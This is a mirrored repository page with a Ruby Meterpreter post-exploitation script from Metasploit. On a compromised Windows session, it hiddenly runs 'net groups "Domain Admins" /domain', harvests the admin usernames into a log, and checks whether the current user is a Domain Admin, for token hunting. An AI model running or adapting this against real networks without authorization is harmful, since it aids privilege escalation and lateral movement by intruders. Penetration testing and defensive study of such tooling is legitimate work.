Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

domain_list_gen.rb 3.3KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # Author: Carlos Perez at carlos_perez[at]darkoperator.com
  7. #-------------------------------------------------------------------------------
  8. #Options and Option Parsing
  9. opts = Rex::Parser::Arguments.new(
  10. "-h" => [ false, "Help menu." ]
  11. )
  12. opts.parse(args) { |opt, idx, val|
  13. case opt
  14. when "-h"
  15. print_line "Meterpreter Script for extracting Doamin Admin Account list for use."
  16. print_line "in token_hunter plugin and verifies if current account for session is"
  17. print_line "is a member of such group."
  18. print_line(opts.usage)
  19. raise Rex::Script::Completed
  20. end
  21. }
  22. def unsupported
  23. print_error("This version of Meterpreter is not supported with this Script!")
  24. raise Rex::Script::Completed
  25. end
  26. #-------------------------------------------------------------------------------
  27. #Set General Variables used in the script
  28. @client = client
  29. users = ""
  30. list = []
  31. host = @client.sys.config.sysinfo['Computer']
  32. current_user = @client.sys.config.getuid.scan(/\S*\\(.*)/)
  33. def reg_getvaldata(key,valname)
  34. value = nil
  35. begin
  36. root_key, base_key = @client.sys.registry.splitkey(key)
  37. open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
  38. v = open_key.query_value(valname)
  39. value = v.data
  40. open_key.close
  41. end
  42. return value
  43. end
  44. domain = reg_getvaldata("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon","DefaultDomainName")
  45. if domain == ""
  46. print_error("domain not found")
  47. end
  48. # Create Filename info to be appended to downloaded files
  49. filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
  50. unsupported if client.platform != 'windows'
  51. # Create a directory for the logs
  52. logs = ::File.join(Msf::Config.log_directory, 'scripts','domain_admins')
  53. # Create the log directory
  54. ::FileUtils.mkdir_p(logs)
  55. #logfile name
  56. dest = Rex::FileUtils.clean_path(logs + "/" + host + filenameinfo + ".txt")
  57. print_status("found users will be saved to #{dest}")
  58. ################## MAIN ##################
  59. #Run net command to enumerate users and verify that it ran successfully
  60. cmd = 'net groups "Domain Admins" /domain'
  61. r = @client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
  62. while(d = r.channel.read)
  63. users << d
  64. if d=~/System error/
  65. print_error("Could not enumerate Domain Admins!")
  66. raise Rex::Script::Completed
  67. end
  68. break if d == ""
  69. end
  70. #split output in to lines
  71. out_lines = users.split("\n")
  72. #Select only those lines that have the usernames
  73. a_size = (out_lines.length - 8)
  74. domadmins = out_lines.slice(6,a_size)
  75. #get only the usernames out of those lines
  76. domainadmin_user_list = []
  77. domadmins.each do |d|
  78. d.split(" ").compact.each do |s|
  79. domainadmin_user_list << s.strip if s.strip != "" and not s =~ /----/
  80. end
  81. end
  82. #process accounts found
  83. print_status("Accounts Found:")
  84. domainadmin_user_list.each do |u|
  85. print_status("\t#{domain}\\#{u}")
  86. file_local_write(dest, "#{domain}\\#{u}")
  87. list << u.downcase
  88. end
  89. if list.index(current_user.join.chomp.downcase)
  90. print_status("Current sessions running as #{domain}\\#{current_user.join.chomp} is a Domain Admin!!")
  91. else
  92. print_error("Current session running as #{domain}\\#{current_user.join.chomp} is not running as Domain Admin")
  93. end